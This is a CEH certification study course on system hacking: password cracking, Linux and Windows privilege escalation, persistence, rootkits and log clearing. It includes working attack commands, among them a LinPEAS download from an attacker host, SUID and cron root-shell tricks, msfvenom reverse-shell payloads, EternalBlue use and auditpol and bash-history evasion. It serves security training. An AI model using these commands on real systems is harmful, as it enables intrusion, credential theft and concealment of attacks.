Intermediate CEH

Ethical Hacking: System Hacking

CEH system hacking — cracking passwords, privilege escalation, persistence, covering tracks and tooling.

Certification: EC-Council CEH 312-50
Exam Weight: ~17% (section System Hacking Phases and Attack Techniques)


Table of Contents

  1. Course Overview
  2. Clarifying CHM Phases
  3. Gaining Access: Cracking Passwords
  4. Gaining Access: More Cracking Methods
  5. Gaining Access: Escalating Privileges
  6. Linux Escalation: Advanced Techniques
  7. Maintaining Access: Executing Applications
  8. Maintaining Access: Hiding Your Tools
  9. Techniques for Establishing Persistence
  10. Clearing Logs: Covering Your Tracks
  11. Hashcat: Complete Guide
  12. Metasploit: Fundamentals
  13. Domain Summary
  14. Key Tools to Remember
  15. Essential Countermeasures
  16. CEH 312-50 Certification Quiz

1. Course Overview

This course is part of the CEH 312-50 certification preparation series by EC-Council. It specifically covers the System Hacking Phases and Attack Techniques objective, representing approximately 17% of the total exam.

Course Objectives

  • Understand and apply the CEH Hacking Methodology (CHM)
  • Master password cracking techniques
  • Understand escalating privileges mechanisms (Windows and Linux)
  • Know the techniques for maintaining access (keyloggers, spyware, backdoors)
  • Know how to hide tools (rootkits, steganography, ADS)
  • Understand how to cover tracks (log erasure)
  • Master key tools: Hashcat, John the Ripper, Metasploit, Mimikatz, Responder

CEH v12/v13 Exam Information

CriteriaValue
Duration4 hours
Questions125 multiple-choice questions
Passing Score~70% (variable per EC-Council)
Modules20 modules, 550+ attack techniques
Practical Labs221 hands-on labs
Practical CertificationCEH Master (theory + practical exam)

Prerequisites (previous courses in the series)

  • Reconnaissance / Footprinting
  • Scanning
  • Enumeration
  • Vulnerability Analysis

2. Clarifying CHM Phases

The CEH Hacking Methodology (CHM)

EC-Council has defined its own methodology, known by the acronym CHM. This course series is structured exactly according to these phases.

flowchart TD
    A[Reconnaissance Footprinting] --> B[Scanning Ports and Services]
    B --> C[Enumeration Accounts Shares Services]
    C --> D[Vulnerability Analysis]
    D --> E[Gaining Access Password Cracking]
    E --> F[Escalating Privileges]
    F --> G[Executing Applications]
    G --> H[Hiding Files Concealment]
    H --> I[Covering Tracks Log Erasure]

    style E fill:#e74c3c,color:#fff
    style F fill:#e74c3c,color:#fff
    style G fill:#e74c3c,color:#fff
    style H fill:#e74c3c,color:#fff
    style I fill:#e74c3c,color:#fff

The 5 Phases of System Hacking

PhaseDescriptionObjectiveConcrete Example
Gaining AccessCrack passwordsFirst entry pointDictionary attack on an account
Escalating PrivilegesIncrease obtained rightsBecome admin/rootExploit HiveNightmare, SUID
Executing ApplicationsInstall malicious softwareMaintain accessInstall keylogger / backdoor
Hiding FilesConceal toolsAvoid detectionHide an executable via ADS
Covering TracksErase evidenceAvoid tracebackDelete system logs

Critical exam point: Hiding Files (hiding active tools) ≠ Covering Tracks (erasing past evidence). These are two distinct phases in the CHM.

Decision Tree — Which Phase?

flowchart TD
    Q{What action is
the attacker performing?}
    Q --> A[Cracking a password
or exploiting a vulnerability to gain entry]
    Q --> B[Escalating rights
from user to admin/root]
    Q --> C[Installing rootkit,
keylogger, backdoor]
    Q --> D[Hiding tools
and ongoing activities]
    Q --> E[Clearing logs
and disabling auditing]

    A --> A1[Gaining Access]
    B --> B1[Escalating Privileges]
    C --> C1[Executing Applications]
    D --> D1[Hiding Files]
    E --> E1[Covering Tracks]

Verification Quiz

QuestionAnswer
Admin rights + rootkit installation → which phase?Executing Applications
Exploiting vulnerabilities to crack passwords → ?Gaining Access
Erasing evidence of activity → ?Covering Tracks
Increasing access rights → ?Escalating Privileges
Hiding tools and activities → ?Hiding Files

3. Gaining Access: Cracking Passwords

3.1 Fundamental Problems with Passwords

Passwords can be captured:

  • Locally (SAM database, NTDS.dit, /etc/shadow)
  • In transit (FTP transmits credentials in cleartext by default)

“Love is great, but not as a password.” — Matt Mullenweg (creator of WordPress).
Note: “love” is one of the 20 most commonly used passwords.

3.2 Password Complexity

ElementExampleNote
UppercaseA, B, ZDo not use all uppercase
Lowercasea, b, zMix with uppercase
Numbers09Insufficient alone
Special characters!, @, #, spaceThe space bar is highly effective

Tip: The space bar is one of the most effective special characters — attackers rarely anticipate it.

The “Fab Five” — Known Attacker Substitutions

Common SubstitutionWhat the Attacker Understands
@ap@ssword = password
$Spa$$word = password
3Epassw3rd = password
0Opassw0rd = password
!i or endpassw0rd! still predictable

Golden rule: Use 15 characters minimum to bypass the LM Hash. Never rely on predictable substitutions.

3.3 Where Are Passwords Stored?

flowchart LR
    subgraph Windows
        A[Local machine] --> B["SAM Database\nC:\Windows\System32\config\sam"]
        C[Domain-joined machine] --> D["NTDS.dit\nC:\Windows\NTDS\ntds.dit\n(on the Domain Controller)"]
    end
    subgraph Linux
        E[Linux] --> F["/etc/shadow - hashes"]
        E --> G["/etc/passwd - accounts"]
    end
    subgraph macOS
        H[macOS] --> I["/Users/<user>.plist"]
    end
SystemLocationNotes
Windows (local)C:\Windows\System32\config\samSAM = Security Account Manager
Windows (domain)C:\Windows\NTDS\ntds.ditOn each Domain Controller
Linux/etc/shadow + /etc/passwdShadow contains the hashes
macOS/Users/<user>.plistApple property format

The SAM database is mounted in the registry under HKEY_LOCAL_MACHINE\SAM at startup. It cannot be copied directly while live — but Volume Shadow Copies can bypass this protection.

3.4 Types of Password Cracking Attacks

flowchart TD
    A[Password Cracking Attack Types] --> B[Passive Attacks]
    A --> C[Non-Electronic Attacks]
    A --> D[Offline Attacks]
    A --> E[Active Online Attacks]

    B --> B1[Network Sniffing - Wireshark tcpdump]
    B --> B2[Replay attacks]
    B --> B3[Man-in-the-Middle MitM]

    C --> C1[Shoulder Surfing]
    C --> C2[Social Engineering]
    C --> C3[Dumpster Diving]

    D --> D1[Pre-computed Rainbow Tables]
    D --> D2[Distributed Network Attack GPU cloud]

    E --> E1[Dictionary Attack - rockyou.txt]
    E --> E2[Brute Force Attack]
    E --> E3[Rule-based Attack]
    E --> E4[Hash Injection Pass-the-Hash]
    E --> E5[LLMNR Poisoning - Responder]

Passive Attacks: Sniffing (Wireshark, tcpdump), replay attacks, Man-in-the-Middle.

Non-Electronic: Shoulder surfing, social engineering, dumpster diving — no technology required.

Offline Attacks: The attacker obtains the password file and cracks it on their own systems.

  • Rainbow tables: pre-computed hash tables
  • Distributed network attack: distributed compute power (AWS, Azure GPU)

Active Online — Dictionary Attack: Text files with thousands of passwords.

  • rockyou.txt: ~14 million passwords
  • Multi-language dictionaries (French, Spanish, Klingon…)
  • String manipulation: computerputercom (automatic anagrams)

Active Online — Brute Force Attack: Tries every possible combination — slow but exhaustive.

Active Online — Rule-based Attack: Combines dictionary + brute force with transformation rules.

3.5 Demo: HaveIBeenPwned

HaveIBeenPwned.com (Troy Hunt): check if an email address or password has been exposed in a data breach.

WARNING: Never enter your password on an external site that requires pressing Enter. The HaveIBeenPwned API uses k-anonymity — only the first 5 characters of the SHA-1 hash are sent.

3.6 The LM Hash — Historical Weaknesses

Password (max 14 chars)
    → Convert everything to UPPERCASE
    → Pad with spaces to 14 characters
    → Split into 2 strings of 7 characters
    → Encrypt each string separately with DES
    → Combine the 2 results = final LM Hash
LM Hash ObservationInterpretation
Last 7 = first 7Password ≤ 7 characters
Pattern “AAD3B435B51404EE…” repeatedPassword ≤ 7 characters (empty padding)

Rule: Always use passwords of 15 characters or more to bypass the LM Hash.

3.7 Demo: Responder (LLMNR Poisoning)

LLMNR (Link-Local Multicast Name Resolution) and NetBIOS: Windows broadcasts multicast requests when DNS fails (e.g., typo in a hostname). Responder intercepts these broadcasts and captures the victim’s NTLMv2 hash.

sequenceDiagram
    participant V as Victim (Windows)
    participant R as Attacker (Responder)
    participant DNS as DNS Server

    V->>DNS: Query for "server2019" (typo)
    DNS-->>V: NXDOMAIN (unknown host)
    V->>R: LLMNR Broadcast - "Who is server2019?"
    R-->>V: "That's me!" (impersonation)
    V->>R: NTLMv2 Authentication - hash captured!
    Note over R: Hash stored in a local text file
# Launch Responder on the eth0 network interface (Kali Linux)
responder -I eth0 -rdwv

# Crack the NTLMv2 hash with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt
john --show crackme.txt

Countermeasure: Disable LLMNR and NetBIOS via GPO (Group Policy Object).

3.8 Password Cracking Tools

ToolTypePlatformDescription
L0phtCrackGUIWindowsWindows password auditing, open-source
John the RipperCLILinux/MultiVersatile, supports many hash formats
HashcatCLIMulti (GPU)Ultra-fast, 300+ algorithms
THC-HydraCLILinuxOnline brute force, multi-protocol
MedusaCLILinuxSimilar to Hydra, parallel
Cain & AbelGUIWindowsCracking + sniffing + MitM + ARP poisoning
pwdump7CLIWindowsHash extraction from SAM
ResponderCLIKali LinuxCaptures NTLMv2 via LLMNR/NetBIOS
Hiren’s BootCDBootableOffline password recovery

4. Gaining Access: More Cracking Methods

4.1 NTLM

Uses challenges and responses. Used without Kerberos.

4.2 Kerberos

Ticket-based. Max 5 minutes clock skew with the PDC.

TermMeaning
KDCKey Distribution Center
TGTTicket Granting Ticket
PDCPrimary Domain Controller

4.3 Salting

Adding a random string before hashing. Renders rainbow tables ineffective.

4.4 Rainbow Tables

Pre-computed hash tables. Cost ~$900 for an MD5 table on a 2TB hard drive.

4.5 Pass-the-Hash

Using the hash directly to authenticate without a plaintext password.


5. Gaining Access: Escalating Privileges

5.1 Concept

“It’s true. I had hacked into a lot of companies, and took a lot of copies of source code to analyze it for security bugs.” — Kevin Mitnick

Once initial access is obtained, the attacker aims to escalate rights to admin/root.

5.2 After Initial Compromise

  • System administration misconfigurations
  • Network infrastructure design flaws
  • Unchanged default passwords
  • Application programming vulnerabilities

5.3 4 Escalation Methods

  1. Pwn an admin/root account directly
  2. Exploit known vulnerabilities (CVEs)
  3. Abuse legitimate features (DLL Hijacking, Shimming)
  4. Configuration errors (NTFS permissions, SUID, sudo)

5.4 Types of Escalation

flowchart LR
    subgraph Vertical
        U1["Standard User"] -->|"Escalation"| A1["Administrator root"]
    end
    subgraph Horizontal
        U2["User A"] -->|"Access"| U3["User B Data"]
    end

Vertical: The user obtains administrative privileges (create accounts, modify config).
Horizontal: Access to another same-level user’s data — less detectable.
Offline Access: Stolen/disconnected machine — the attacker has all the time needed.


5.5 HiveNightmare (CVE-2021-36934)

Discovered August 2021: SAM database readable by normal users on certain Windows 10/11 (bad NTFS permissions + Shadow Copies).

:: Check if the system is vulnerable
icacls C:\Windows\System32\config\sam
:: VULNERABLE result: BUILTIN\Users:(I)(RX)

:: Patch: KB5004705 (Windows 10) or KB5004760 (Windows 11)

5.6 DLL Hijacking

Applications search for DLLs in the application directory first (if no absolute path is specified).

flowchart TD
    A[Application starts] --> B{Searches for library.dll}
    B --> C["1. Application directory"]
    C --> D{Found?}
    D -->|Yes| E["Loads DLL (could be malicious!)"]
    D -->|No| F["2. C:\\Windows\\System32 (legitimate)"]
    style E fill:#e74c3c,color:#fff
    style F fill:#27ae60,color:#fff

Exploitation: Place a malicious DLL with the same name in the target application’s directory. Common vector: torrents of cracked software (Fortnite, Adobe Photoshop…).

5.7 Spectre and Meltdown

VulnerabilityAffected ProcessorsMechanism
SpectreAMD, Apple, ARM, Intel, Samsung, QualcommSpeculative execution
MeltdownPrimarily Intel (not Qualcomm)Kernel memory access from user space

Exam note: Meltdown does not affect Qualcomm. Spectre affects all vendors.

5.8 Other Windows Techniques

Access Token Manipulation: Manipulate Windows tokens -> Spoofed Tokens.

Application Shimming: Abuse of WACF (Windows App Compatibility Framework) to bypass UAC, inject DLLs, or install backdoors.

Armitage: Graphical interface (GUI) for Metasploit.


6. Linux Escalation: Advanced Techniques

6.1 Attack Vector Overview

mindmap
  root((Linux Privilege Escalation))
    SUID Binaries
      find / -perm -4000
      bash -p
      cp passwd injection
    Sudo Abuse
      sudo -l
      GTFOBins
      NOPASSWD entries
    Cron Jobs
      writable scripts
      PATH hijacking
    Capabilities
      cap_setuid
    Kernel Exploits
      Public CVEs

6.2 Enumeration with LinPEAS

cd /tmp
wget http://ATTACKER_IP/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh

Color codes: Red = known vulnerability (GTFOBins) | Yellow = unusual | Green = standard

6.3 SUID Binaries

The SUID bit: the program runs with the rights of the file owner (often root).

# Enumerate all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

# Scenario 1: SUID bash
/usr/local/bin/rootbash -p    # -p preserves effective UID
id                             # eUID=0 = root

# Scenario 2: SUID cp - injection into the accounts file
cat /etc/passwd > /tmp/passwd.new
# Add a UID 0 account in /tmp/passwd.new
cp /tmp/passwd.new /etc/passwd
su newroot

# Scenario 3: PATH Hijacking (SUID binary without absolute path)
echo "/bin/bash" > /tmp/ifconfig
chmod 777 /tmp/ifconfig
export PATH=/tmp:$PATH
/path/to/suid_binary     # root shell!

# Scenario 4: SUID nano
nano /etc/passwd
# Remove the x from the root line -> passwordless login

6.4 Sudo Abuse

sudo -l    # List available sudo commands
# Reference: https://gtfobins.github.io/#+sudo

6.5 Cron Jobs

cat /etc/crontab
ls -la /etc/cron.*
# If a cron script is writable:
echo "chmod +s /bin/bash" >> /path/to/cron_script.sh
# bash -p after cron executes

6.6 Enumeration Tools

ToolUsage
LinPEASFull Linux enumeration script
WinPEASWindows equivalent
GTFOBinsCatalog of abusable Unix binaries (gtfobins.github.io)
suid3numAutomated SUID enumeration + GTFOBins
LinEnumLightweight Linux enumeration script

7. Maintaining Access: Executing Applications

7.1 Objective

After taking control of a system, the goal is to maintain access in order to:

  1. Always be able to return (even after a reboot)
  2. Explore the target’s network environment
  3. Collect additional information

A total pwn = returning to the system even after a reboot or password change.

7.2 Remote Code Execution (RCE)

TechniqueVectorDescription
Client ExecutionWeb browserSpear phishing, drive-by
Office ExploitsWord/ExcelMalicious macros
Third-party ExploitsAdobe Reader, FlashThird-party applications
Scheduled TasksWindowsat, schtasks
Service ExecutionWindows SCMCreating a malicious service
WMIWindowsLocal and remote execution
:: Create a malicious service
sc create SvcName binPath= "C:\path\program.exe" start= auto
sc start SvcName

:: Execute via WMI remotely
wmic /node:TARGET process call create "cmd.exe /c program.exe"

:: Persistent scheduled task
schtasks /create /tn "TaskName" /tr "C:\program.exe" /sc onlogon /ru SYSTEM

7.3 Keyloggers

Record all keystrokes (and sometimes mouse clicks, screenshots).

TypeMethodDetection Difficulty
Software (API hooking)Intercepts Windows API callsEasy (antivirus)
Software (Form grabbing)Captures web forms before HTTPSModerate
Hardware (USB/PS2)Looks like a physical adapterVery difficult
Kernel-basedKernel-level driverDifficult

Countermeasure: Regular physical inventories. Check the back of workstations.

7.4 Types of Spyware

TypeDescription
Desktop SpywareInstalled with an application (Next/Next/Next…)
Video SpywareWebcam without indicator light
Audio SpywareActivates the microphone in the background
GPS SpywareLocates the device
Screenshot SpywarePeriodic screenshots

Crackers: Tools that “unlock” software — often contain hidden malware.

7.5 Backdoors

Hidden access to a system, allowing the attacker to return at any time.

flowchart LR
    A["Attacker - SERVER Component"] <-->|"Encrypted Communication"| B["Victim - CLIENT Component"]
    style A fill:#e74c3c,color:#fff
    style B fill:#3498db,color:#fff

Historical examples: NetBus (eject CD drive, invert mouse), Back Orifice, Metasploit.


8. Maintaining Access: Hiding Your Tools

8.1 Rootkits

The most formidable tool — modifies the operating system to make itself invisible and maintain persistent access.

Origin (2005): Sony installed a rootkit on ~22 million audio CDs as an anti-copy measure. Discovered by Mark Russinovich (Sysinternals). F-Secure was the first to flag it as dangerous.

Types of Rootkits

TypeLevelDetectionExamples
User ModeUser spaceEasy (antivirus)FinFisher
Kernel ModeSystem kernelDifficultAzazel
FirmwareBIOS/UEFI, HDDVery difficult (persists after reinstall)LoJax
BootloaderMBR/UEFI boot recordDifficult (bypasses Secure Boot)Grayfish
HypervisorHypervisor layerExtremely difficultBlue Pill
MemoryLinux RAM diskDifficultHorse Pill

Absolute rule: A system infected by a rootkit must be completely reinstalled. It can no longer be trusted.

Rootkit Detection

MethodTools
Integrity-based (baseline)Tripwire, AIDE
Signature-basedAntivirus, F-Secure
Heuristic/Behavior-basedBehavioral analyzers
:: Search for hidden files
dir /s /b /ah        :: Hidden files
dir /s /b /a-h       :: Normal files
:: Compare both lists to detect suspicious hidden files

8.2 Alternate Data Streams (ADS)

NTFS feature since Windows NT 3.1 for Mac compatibility (MHFS). The system stores data in two forks:

  • Data fork: visible content
  • Resource fork: metadata (and malicious ADS)

Fact: The majority of IT professionals have never heard of ADS!

mkdir C:\streams
cd C:\streams
echo Visible content > visible.txt
type program.exe > visible.txt:hidden.exe
:: visible.txt keeps its original size — the executable is invisible!
dir /r    :: Reveals ADS
Get-Item -Stream * visible.txt    :: PowerShell

8.3 Steganography

Hiding the existence of a message by concealing it in an ordinary file.

  • Encryption: hides the content but signals that there is a secret
  • Steganography: hides the very existence of the message
JPEG Image (1 MB) + Secret Document (4 MB) = Steganographic Image (5 MB)
ClassificationDescription
Technical SteganographyScientific method (LSB substitution)
Linguistic SteganographyMessage hidden in linguistic content
MediumTools
Images (JPEG, PNG)Steghide, OpenStego, SilentEye
Audio (MP3, WAV)Steghide, MP3Stego
DocumentsOpenPuff
steghide embed -cf image.jpg -sf secret.txt -p Password123
steghide extract -sf image.jpg -p Password123
# Detection: stegdetect, zsteg

Real use case: Terrorist organizations use steganography to communicate via images publicly posted on social networks.


9. Techniques for Establishing Persistence

9.1 Concept

Allows maintaining unauthorized access even after reboots, password changes, or partial cleanup attempts.

flowchart TD
    A[Attacker] --> B{Persistence Techniques}
    B --> C[Remote Code Execution on Domain Controllers]
    B --> D[Malicious Replication - DCSync]
    B --> E[Skeleton Key Attack]
    B --> F[Golden Ticket Attack - KRBTGT]
    B --> G[Silver Ticket Attack - SAM]
    B --> H[AdminSDHolder Manipulation]
    B --> I[WMI Event Subscription]
    B --> J[Overpass-the-Hash]

9.2 Remote Code Execution on Domain Controllers

Using WMI to execute code on a domain controller remotely.

9.3 Malicious Replication (DCSync)

Uses the DCSync service to replicate data from a DC to local systems. Objective: KRBTGT account (Kerberos master key).

9.4 Skeleton Key Attack

Modify the credentials of any domain account with a “universal” password.

9.5 Golden Ticket Attack

If the attacker obtains the KRBTGT account, they can forge a ticket that grants access to the entire domain — valid for up to 10 years!

flowchart LR
    A[Attacker] -->|"1. Compromises an account"| B[Valid Account]
    B -->|"2. Escalates to domain"| C[Domain Account]
    C -->|"3. Steals KRBTGT hash"| D[KRBTGT Hash]
    D -->|"4. Forges a Golden Ticket"| E["TOTAL domain access"]
    style E fill:#e74c3c,color:#fff

9.6 Silver Ticket vs Golden Ticket

Golden TicketSilver Ticket
TargetEntire domain (AD)A local system (SAM)
Hash usedKRBTGT hashService user hash
ScopeEntire domainSingle service/system

9.7 AdminSDHolder

AD container that propagates rights to privileged accounts every 60 minutes. An attacker modifies it to maintain persistent access.

9.8 WMI Event Subscription

Create a WMI subscription to execute scripts. Advantage: No executable left on the system — untraceable.

9.9 Overpass-the-Hash

NTLM protocol weaknesses: use the hash to authenticate. Can bypass MFA.

9.10 Countermeasures

CountermeasureDescription
UpdatesRegularly patch systems
MFAMulti-factor authentication
KRBTGT RotationChange KRBTGT twice in succession to invalidate Golden Tickets
AdminSDHolderMonitor changes (EventID 4670)
WMI LoggingMonitor WMI events
Application WhitelistingAppLocker, WDAC
DCSync RestrictionReplication rights only for legitimate DCs

10. Clearing Logs: Covering Your Tracks

10.1 Why Cover Tracks?

  • Stay in the shadows: avoid alerting defenders
  • Prevent trace-backs: prevent a forensic expert from tracing back to the attacker
  • Enable return: maintain the ability to come back to the system

“These are not the droids you’re looking for.” — Obi-Wan Kenobi

10.2 Basic Method (Good Attacker)

Simple actions but easily detectable:

  • Clear browser history + cookies
  • Delete temporary files
  • Empty the recycle bin

Critical problem: Deleting logs leaves a trace! In the Windows Event Viewer, the first entry after clearing is a “Log Cleared” event indicating who deleted it and when.

10.3 Advanced Method (Expert Attacker)

flowchart LR
    A["Disable auditing - auditpol"] --> B["Perform actions"] --> C["Re-enable auditing"]
    style A fill:#e74c3c,color:#fff
    style B fill:#c0392b,color:#fff
    style C fill:#e74c3c,color:#fff

10.4 Important Windows Logs

Location: C:\Windows\System32\winevt\Logs\ (.evtx extension)

LogKey EventIDsDescription
Security4624 (logon), 4625 (failure)Logins, rights modifications
SystemVariableSystem events
PowerShell4103, 4104PS script execution

10.5 auditpol — Disable Auditing

:: Display audit policies
auditpol /get /category:*

:: Disable logon auditing
auditpol /set /subcategory:"Logon/Logoff" /success:disable /failure:disable

:: Re-enable after operations
auditpol /set /subcategory:"Logon/Logoff" /success:enable /failure:enable

10.6 Covering Bash Tracks (Linux)

history                           # View history
export HISTSIZE=0                 # Clear in memory
cat /dev/null > ~/.bash_history   # Clear on disk
unset HISTFILE                    # No recording

History remains in memory while the terminal is open. Close and reopen the terminal for the clear to take effect.


11. Hashcat: Complete Guide

11.1 Overview

Hashcat is the fastest cracking tool, using GPU acceleration.

FeatureValue
Algorithms300+ (MD5, NTLM, SHA-1, SHA-256, bcrypt…)
Attack modes9 distinct modes
AccelerationCPU, GPU, FPGA
LicenseOpen-source (MIT)

11.2 Attack Modes

ModeNumberNameDescription
Straight / Dictionary-a 0WordlistDictionary attack
Combination-a 1CombinatorConcatenates words from two lists
Brute-Force / Mask-a 3MaskAll combinations with a mask
Hybrid Wordlist + Mask-a 6HybridDictionary + right-side mask
Hybrid Mask + Wordlist-a 7HybridLeft-side mask + dictionary

11.3 Built-in Charsets

SymbolCharset
?labcdefghijklmnopqrstuvwxyz
?uABCDEFGHIJKLMNOPQRSTUVWXYZ
?d0123456789
?sSpecial characters
?aAll printable characters

11.4 Common Hash Types (-m flag)

TypeCodeNotes
MD50Very common
SHA-1100Deprecated
SHA-2561400Common
NTLM1000Windows passwords
NTLMv25600Captured by Responder
bcrypt3200Secure algorithm, slow
WPA/WPA222000Wi-Fi handshake

11.5 Essential Commands

# GPU/CPU benchmark
hashcat -b
hashcat -hh    # Show all modes

# Dictionary - MD5
hashcat -m 0 -a 0 md5.hash /usr/share/wordlists/rockyou.txt

# Dictionary - NTLM
hashcat -m 1000 -a 0 ntlm.hash /usr/share/wordlists/rockyou.txt

# Dictionary + transformation rules
hashcat -m 0 -a 0 hash.txt wordlist.txt -r rules/best64.rule

# Brute-force (6 arbitrary characters)
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

# Mask: 1 uppercase + 5 lowercase + 2 digits
hashcat -m 0 -a 3 hash.txt ?u?l?l?l?l?l?d?d

# Automatically identify hash type
hashcat --identify hash.txt

# Show results
hashcat -m 1000 hash.txt --show

12. Metasploit: Fundamentals

12.1 Architecture

flowchart TD
    A[Metasploit Framework] --> B[Exploits - Code that exploits vulnerabilities]
    A --> C[Payloads - Code executed after exploit]
    A --> D[Auxiliary - Scanners, fuzzers]
    A --> E[Post - Post-exploitation]
    A --> F[Encoders - Avoid detection]
    C --> C1[Singles - Standalone payload]
    C --> C2[Stagers - Downloads the stage]
    C --> C3[Stages - Meterpreter payload]

12.2 Essential Commands

msfconsole
help
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
info
show options
show payloads
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
run

Meterpreter Commands (after connection):

sysinfo          # System information
getuid           # Current user
getsystem        # Attempt escalation
hashdump         # Extract SAM hashes
ps               # List processes
shell            # cmd.exe shell
background       # Move to background
sessions -l      # List sessions

12.3 Payload Generation (msfvenom)

# Windows - reverse shell EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o agent.exe

# Linux - reverse shell ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o agent.elf

# PHP - web server
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php

13. Domain Summary

mindmap
  root((System Hacking CEH 312-50 17%))
    Gaining Access
      Password Cracking
        SAM NTDS shadow
        Dictionary Brute Force
        Responder John Hashcat
      More Cracking
        NTLM Kerberos
        Rainbow Tables Salting
        Pass-the-Hash
    Escalating Privileges
      Windows
        Vertical Horizontal
        DLL Hijacking
        HiveNightmare
        Spectre Meltdown
      Linux
        SUID GTFOBins
        Sudo Abuse
        Cron Jobs PATH
    Maintaining Access
      Executing Apps
        Keyloggers
        Spyware
        Backdoors Metasploit
      Hiding Tools
        Rootkits 6 types
        ADS NTFS
        Steganography
    Persistence
      Golden Silver Ticket
      Skeleton Key DCSync
      AdminSDHolder WMI
    Covering Tracks
      auditpol Event Viewer
      Bash History

Phase Summary

PhaseObjectiveKey Tools
Gaining AccessObtain credentialsResponder, John the Ripper, Hashcat, L0phtCrack
Escalating PrivilegesIncrease rightsMimikatz, Metasploit, LinPEAS, GTFOBins
Executing ApplicationsInstall and maintainMetasploit, msfvenom, WMI, SCM
Hiding FilesConceal toolsADS, Steghide, rootkits
Covering TracksErase evidenceauditpol, Event Viewer, bash history
PersistenceMaintain accessMimikatz (Golden/Silver Ticket), WMI

14. Key Tools to Remember

ToolCategoryPlatformDescription
John the RipperPassword CrackingLinux/MultiVersatile, many formats
HashcatPassword CrackingMulti (GPU)Ultra-fast, 300+ algorithms
THC-HydraOnline Brute ForceLinuxMulti-protocol (HTTP, FTP, SSH…)
MedusaOnline Brute ForceLinuxSimilar to Hydra, parallel
L0phtCrackPassword AuditingWindowsWindows auditing, open-source
Cain & AbelPassword CrackingWindows/GUICracking + sniffing + MitM
ResponderLLMNR PoisoningKali LinuxCaptures NTLMv2 via LLMNR
MimikatzCredential DumpingWindowsGolden/Silver Ticket, PtH
MetasploitExploitationMultiFull exploitation framework
msfvenomPayload GenerationMultiPayload creation
ArmitageExploitationGUIGraphical interface for Metasploit
SteghideSteganographyMultiHide files in images/audio
Tripwire / AIDERootkit DetectionLinuxIntegrity-based detection
pwdump7Hash DumpingWindowsHash extraction from SAM
WiresharkSniffingMultiTraffic capture and analysis
LinPEAS/WinPEASEnumerationMultiPost-exploitation enumeration
GTFOBinsReferenceWebCatalog of abusable Unix binaries

Essential Commands

:: Windows - SAM and permissions
icacls C:\Windows\System32\config\sam
auditpol /get /category:*
auditpol /set /subcategory:"Logon/Logoff" /success:disable /failure:disable
dir /s /b /ah
dir /r
# Linux - password files
cat /etc/shadow
cat /etc/passwd

# Linux - SUID
find / -perm -u=s -type f 2>/dev/null

# Linux - history
history
export HISTSIZE=0
cat /dev/null > ~/.bash_history

# Kali - password cracking
responder -I eth0 -rdwv
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
hashcat -m 1000 -a 0 ntlm.hash wordlist.txt
hashcat -m 5600 -a 0 ntlmv2.hash wordlist.txt

# Steganography
steghide embed -cf image.jpg -sf secret.txt -p password
steghide extract -sf image.jpg -p password

15. Essential Countermeasures

15.1 Passwords

ThreatCountermeasurePriority
Dictionary attacksPasswords 15+ charactersCritical
LM HashPasswords 15+ charactersCritical
LLMNR PoisoningDisable LLMNR/NetBIOS via GPOCritical
Rainbow TablesPassword saltingCritical
Pass-the-HashMFA, Credential GuardCritical
Online Brute ForceAccount lockout policy, rate limitingHigh
Password reusePassword managerHigh

15.2 Privilege Escalation

ThreatCountermeasure
DLL HijackingUse absolute paths in applications
HiveNightmarePatch Windows (KB5004705 / KB5004760)
Spectre/MeltdownFirmware and OS updates
Misconfigured SUIDRegularly audit SUID binaries
Misconfigured sudoRestrict sudoers, avoid NOPASSWD
Writable cron jobsStrict permissions on cron scripts

15.3 Persistence

ThreatCountermeasure
Golden/Silver TicketChange KRBTGT twice in succession
DCSyncRestrict AD replication rights
WMI SubscriptionEnable WMI logging
AdminSDHolderMonitor modifications

15.4 Defense in Depth

flowchart TD
    A[Defense in Depth] --> B[Updates and patches]
    A --> C[MFA on all privileged accounts]
    A --> D[Physical and software inventories]
    A --> E[Anti-phishing training]
    A --> F[Application Whitelisting AppLocker]
    A --> G[SIEM and centralized logs]
    A --> H[Principle of least privilege]
    A --> I[GPO - Disable LLMNR/NetBIOS]
    style A fill:#2c3e50,color:#fff

16. CEH 312-50 Certification Quiz

16.1 CHM Phases

QuestionAnswer
Admin rights + rootkit installation?Executing Applications
Exploiting vulnerabilities to crack passwords?Gaining Access
Erasing evidence of your presence?Covering Tracks
Increasing access rights?Escalating Privileges
Hiding tools and activities?Hiding Files
Difference between Hiding Files vs Covering Tracks?Hiding = concealing active tools; Covering = erasing past evidence

16.2 Password Storage

QuestionAnswer
Passwords on a domain controller?NTDS.dit (C:\Windows\NTDS\ntds.dit)
Passwords on a local Windows machine?SAM database (C:\Windows\System32\config\sam)
Passwords on Linux?/etc/shadow (hashes) and /etc/passwd
Passwords on macOS?/Users/<user>.plist
SAM database in the registry?HKEY_LOCAL_MACHINE\SAM

16.3 Attack Types

QuestionAnswer
Attack using a file with thousands of passwords?Dictionary attack
Attack that tries every combination?Brute force attack
Rainbow tables = what type?Offline attack
Shoulder surfing = what type?Non-electronic attack
Tool that captures NTLMv2 via LLMNR?Responder
Adding random characters before hashing?Salting
LM hash with repeated pattern twice?Password <= 7 characters

16.4 Escalation

QuestionAnswer
User obtains admin rights → type?Vertical escalation
Accessing another same-level user’s files?Horizontal escalation
Stolen machine disconnected from the network?Offline access
GUI interface for Metasploit?Armitage
Malicious DLL in application directory?DLL Hijacking
CVE-2021-36934?HiveNightmare
Which one affects Qualcomm: Spectre or Meltdown?Spectre (Meltdown = primarily Intel)
Windows token manipulation?Spoofed tokens
Abuse of Application Compatibility Framework?Application shimming

16.5 Rootkits and ADS

QuestionAnswer
System infected by rootkit → what to do?Wipe and completely reinstall
Easiest rootkit to detect?User mode rootkit
Rootkit that persists after OS reinstall?Firmware rootkit
Rootkit that bypasses Windows Secure Boot?Grayfish (bootloader)
Rootkit that infects the Linux RAM disk?Horse Pill
